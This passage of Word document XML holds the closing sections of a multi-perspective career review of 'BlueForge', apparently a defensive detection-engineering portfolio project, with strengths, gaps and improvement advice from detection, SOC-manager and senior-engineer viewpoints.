      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="as-a-crowdstrike-detection-engineer"/>
      <w:r>
        <w:t xml:space="preserve">As a CrowdStrike detection engineer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strengths.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You detect behavior, not tools (the certutil and LOLBIN framing is correct). Rules are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">versioned, tested, and MITRE-mapped, with documented false positives. That is genuinely how a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detection content team works. The "smallest rule that still catches them" instinct is the right one.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The detection set is entry-level so far: single-event, command-line string matches.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Real adversaries evade those. There is little behavioral or correlation logic, no consideration of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detection evasion beyond casing, and no data volume to prove the rules survive contact with noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To stand out:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">add multi-event correlation and parent-child logic, write one rule that survives a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deliberate evasion attempt you document, and measure false-positive rate against a realistic noisy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dataset. Show a rule's whole lifecycle: hypothesis, telemetry, rule, test, evasion, tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="as-a-soc-manager"/>
      <w:r>
        <w:t xml:space="preserve">As a SOC manager</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strengths.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The triage and reporting automation solves a real analyst pain. Playbooks, incident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reports, and investigation steps show you think about the human workflow, not just the tech. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">isolated-lab and secrets discipline says you can be trusted with access.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No alerting/notification path, no case tracking, and no metrics on analyst time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">saved. As a manager I want to know it reduces mean-time-to-triage, and that is not measured yet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To stand out:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">add one metric (for example, time from log to report) and a simple notification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(a webhook to a chat channel). Frame the value in SOC terms: fewer clicks, faster triage, consistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="as-a-general-senior-engineer"/>
      <w:r>
        <w:t xml:space="preserve">As a general senior engineer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strengths.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Small, typed, tested, documented, and honest about its own scope. The deliberate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omissions (no DB, no web UI, no async) are defensible and show maturity. The docs are unusually good</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for a portfolio project.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The custom engine is a subset of Sigma and could drift from the real spec; the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">threat-intel layer is stubbed; there is no end-to-end integration test that runs the whole CLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To improve:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">add one integration test that exercises</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blueforge detect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on sample logs and asserts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the report, and be explicit in the README about what the engine does and does not support versus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">full Sigma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="Xde2a855bb3486e48b61c8e2d1198cb005ff208c"/>
      <w:r>
        <w:t xml:space="preserve">What makes this stand out vs look like a student project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stands out:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">real detections mapped to ATT&amp;CK with tests and tuning; a normalized schema; CI and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">clean git history; documentation that explains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; dual-stack parity; honest scoping decisions;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lab evidence (screenshots, simulations) proving it actually runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Looks like a student project (avoid these):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a pile of scripts with no tests or structure;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detections copied without understanding or MITRE mapping; a README that is only an install list; no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">evidence it ran (no screenshots, no sample outputs); over-engineering (microservices, a database, a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web UI) with nothing behind it; and inflated claims that do not match the commit history. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">single biggest tell is the inability to explain a component you wrote. Every line here should pass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the "explain it out loud" test, which is exactly what this project is optimized for.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="the-one-sentence-verdict"/>
      <w:r>
        <w:t xml:space="preserve">The one-sentence verdict</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If Phases 0 to 4 are actually completed, tested, and documented as described, BlueForge is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">top-decile junior portfolio project for the Canadian SOC/detection market, provided you deepen the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Microsoft side and add correlation and evasion-aware detections before calling it done.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2026-07-13T03:17:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-13T03:17:06Z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